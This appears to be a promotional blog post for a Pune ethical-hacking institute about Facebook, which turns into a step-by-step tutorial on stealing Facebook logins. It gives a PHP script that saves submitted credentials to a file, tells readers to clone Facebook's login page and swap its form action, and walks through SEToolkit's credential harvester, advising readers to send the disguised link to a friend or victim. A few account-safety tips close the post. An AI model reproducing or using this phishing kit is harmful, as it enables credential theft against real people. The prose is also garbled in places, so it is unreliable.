What is Facebook?

Facebook is a network of people who are connected online. Facebook is a social media platform where users can share photos, videos, voice, emotions, etc. Not only they can share all of these but they can also make a video call, make a voice call. With this platform, users can view host live show and other users can watch the live show at their internet-enabled device, such as mobile phone, laptop computer, desktop computer, tablet, etc. instead of these features, Facebook has some more features which are mentionable but I am not all of those. One of those key features is to share anything with a selected audience, which means you can share your content with only your friends in your list or with all users who are on facebook. This is not just the end of facebook features. One more key feature of facebook is to chat, making voice calls, making video calls with one person or group of people

How did Facebook get started?

In the year of 2004, on February Facebook has started its journey as a social network which was only for school-based at Harvard University. Facebook is a great web-based Application Software for social media which is developed by Mark Zuckerberg with the help of Edward Saverin. They both were students of the same college. The facebook was not open to all until 2006. Till then it was only for school students after that Facebook was accessible for all and then anyone could access. In that era, another popular social networking medium was named MySpace. Facebook got more popular than Myspace in the world. This is the most used social networking website in the world.

Facebook is not just a social media platform, it is contains all types of people like students, professionals, businessmen, etc. That is why Facebook attracts people most to this social media platform. Businessman often uses facebook for marketing to attract a certain amount of people. This is the main reason for the popularity of Facebook.

The main attraction of Facebook

Facebook has a user-friendly interface and anyone can access it. Non-technical people like who do have minimum knowledge of technology, even those who can use Facebook like uploading a photo, video, sharing feelings, text chatting, voice chatting, video chatting, etc. Facebook is created for reconnecting people online. I used the word reconnecting because people can find their old friends who are not in touch with them because of the busy life schedule. This is not just the end of the attraction of Facebook. Because of being all kinds of people Facebook provides a great platform for the marketing of a business. For marketing, Facebook can target selected types of people so Facebook can show the advertisements to them.

Facebook provides a very easy and great interface for users to use this web application and these features make Facebook user-friendly. Facebook is not just a social media platform, it makes people laugh, chilled, entertained and more and more.

How to get started with facebook?

 Well,if still you are not using facebook. I am quite surprised. Hurry up and go to facebook and Sign up to Facebook.

The interface of Facebook looks like the above picture. Here you can sign up with your details and click on the sign-up button. And your account will be opened. And then enjoy Facebook.

How Facebook account can be hacked:

Now the question is “How to hack Facebook?” Well, Facebook is one of the most secure web applications or web site in the world. Facebook can not be hacked so easily. But I am not saying that Facebook never hacked. Facebook has hacked a lot of times. But Facebook has recovered the losses though after being hacked.

Here I am talking about an attack on Facebook. Almost 50 million user accounts were in danger. The accounts could be overtaken by an attacker over the user.

According to the Facebook statement, the bugs have been patched before the could be used by the attacker to attack the victim’s account. But the company says that it is unclear that the data is misused by the attacker which is obtained from the victim’s account. The data could be private messages in the chat. The action of that bug is 90 million Facebook users logged out from their accounts. This is part of that bug fixed. And after all of these Facebook has also said that other third party web applications or web sites could also be affected with vulnerability. Other than facebook, you can find out vulnerability in any webiste or application, you just need to find best ethical hacking institute in pune which will guide you through entire process if you want to learn it practically.

This is a vulnerability that Facebook contained but right now Facebook does not have the vulnerability. So, Facebook can not be hacked!

Through the application vulnerability, Facebook hacking is quite impossible right now. There is a way to hack Facebook through social engineering. Yes, Facebook can be hacked through phishing and brute-forcing. For brute force, there are numerous scripts available on the internet but brute-forcing is not the ideal way to hack facebook due to its security reason. But sometimes some scripts work perfectly, it gives the perfect result but it is not a reliable way of Facebook hacking. So, I am not using the brute force technique for Facebook hacking.

1. Phishing using php script :

Phishing is the best way for Facebook hacking. For phishing, you have to follow some steps. The following are the steps for hacking Facebook with phishing.

Step1: –

First of all you have to use hosting. For hosting files there are numerous ways. You can register for a free web hosting service or make your computer a server with any application which can create a server on any operating system. On my computer I am using Kali Linux, for creating server I am using apache2 and a php script for redirecting the login credentials to my hosting server.

Step2: –

I am providing the PHP script which I am using. 

PHP Script: – 

<?php header (‘Location:https://vicetech.in/admin’); $handle =

fopen(“usernames.txt”, “A”); foreach($_POST as $variable => $value) {

fwrite($handle, $variable);    fwrite($handle, “=”);    fwrite($handle,

$value);    fwrite($handle, “\r\n”); } fwrite($handle, “\r\n”);

fclose($handle); exit; ?>

This PHP script will redirect the credentials to your hosting server. Now, save the script with any name and put the extension ‘.php’ like (name.php).

Step3: –

Ok, here is the practical to perform the phishing technique. 

At first, open Facebook log in page and right on the blank space and click on the view page source.

 

 

After clicking on that a new tab will be opened in your browser. Then copy the HTML code from that tab and paste it on any text editor and find ‘action=’ then replace the link with the name of the PHP script.

 

 

 

Save the file with a name and provide ‘.html’ extension like (facebook.html).
And keep the both file in the hosted folder.

Step 4: –
The last step you have to do is, in order to share the page to through the internet. You have to use any free web hosting service you may use port forwarding to host the phishing page.
Yes, that’s it. You are done. Now, share the HTML file link to the victim or victims. After entering the credentials in the input box the credentials will be forwarded to your server.

2. Using SEtoolkit :

   SEtoolkit is default application which is present in kali linux , so here as an attacking platform, we are using kali linux and as a victim, we will use window, for how to install kali linux, you can go through top mentor’s blogs which I have posted previously. If you want to learn other attacks than facebook phishing through setoolkit, you can refer to any best ethical hacking institute in pune, there any mentor will guide you about several different attacks.

Step 1 :
Type setoolkit in terminal then following screen will appear

 

Step 2 :
Here we are going to perform social engineering attacks so type 1 and press enter

 

Step 3 :
Next we are going to choose website attack vectors so type 2 and then press enter

 

Step 4 :
Enter 3 to choose the ‘Credential Harvester Attack Method’ so that we can have the victim’s confidential information which can be obtained by cloned page that will have the login page which contains the username and password options.

Step 5 :
If you choose Web Templates, you will get that SEToolkit is having multiple login page templates in it along with facebook login page  a Facebook login page template. But initially, we need to enter our IP address for SEToolkit to send back credentials.If you want to use it outside your network, you can use your public IP address,  But first, perform port forwarding to port 80 to your local IP.

 

Step 6 :
Here as mentioned in previous step, we are going to need ip address, so you can find your ip address by opening new terminal and typing ifconfig there, you will find your ip address as shown below.

 

Step 7 :
As mentioned in step 5, choose facebook template from the options available after selecting web templates, press 3 here.
NOTE: You must have Apache already  installed in your device. If you are using  Kali and Backtrack then by default they have apache installed, but if you are using some other operating system then some other, you need to install it manually. To install apache, type sudo apt-get install apache2.

After you select your template, below screen will appear

 

Step 8 :
Send that to particular person whose credentials you want . You need to just send your friend an email with your IP address as the link. For example: instead of sending “http://yourip ” you would send “Facebook.com” with your IP present in it as the link.

Step 9 :

when your friend clicks on a particular link sent by you, he/she will get exact same page which looks like facebook credential page,

As soon as he/she enters credentials on that page, you will get credentials on your terminal or they as saved in your device as shown below.

How to prevent your facebook account from being hacked? :

There are few things you need to take care to prevent yourself from this kind of attack:

⦁    Keep Strong Password :
Keep strong and very unusual password which would be very difficult to guess by anyone, make sure you change your password often

⦁    Login from trusted Devices :
Always login from your own device if you login from any other device, make sure to uncheck remember login details box while login

⦁    Clear History and Log out :
When you are not login from your device, make sure to clear browsing history as well as log out from the particular device.

⦁    Enable Login Notification :

You can activate Login Notification even if someone tries to login with your credentials, you will get  a Notification on your mobile and if you find particular notification on your cell phone, immediately change your password as hacker is having your password who is trying log in to your Facebook Account.

To Enable Login Notification :
Go to Home -> Account Settings -> Security -> Login Notification. Put a Check Mark on your preferred option and click the Save Changes button.

⦁    Always crosscheck your Active Sessions:

If you find any location or device which is unfamiliar, that means your Facebook Account is accessed from somewhere from unknown place/device. In this case, you have to click on End Activity and  to change your password after that.
To have a look at Active Sessions
Go to Home -> Account Settings -> Security -> Active Sessions.

Plus there are different other small aspects which also can lead to this kinds of attacks, if you want to learn more about attacks and techniques, you can search for best ethical hacking institute in pune which will serve this purpose or in top mentor also we teach every single attack from scratch. how to choose best ethical hacking institute in pune, what should be criteria for it, for that you can go through our blog.